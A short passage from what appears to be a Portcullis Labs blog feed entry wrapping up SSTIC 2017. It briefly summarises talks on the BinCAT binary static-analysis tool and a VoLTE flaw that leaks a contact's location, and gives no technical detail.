  • BinCAT: purrfecting binary static analysis: BinCAT is a tool able to perform static analysis on x86 binaries with the following features: value analysis (registers and memory), taint analysis, type reconstruction and propagation, backward and forward analysis. Full article in English
  • Subscribers remote geolocation and tracking using 4G VoLTE enabled Android phone: P1Sec presented an issue on the VoLTE (Voice over LTE) protocol allowing to leak the position (localization) of your contact. Full article in English

References

A more detailed write-up in English can be found on the following links:

The post SSTIC 2017 wrap-up appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/sstic-2017-wrap-up/feed/ 0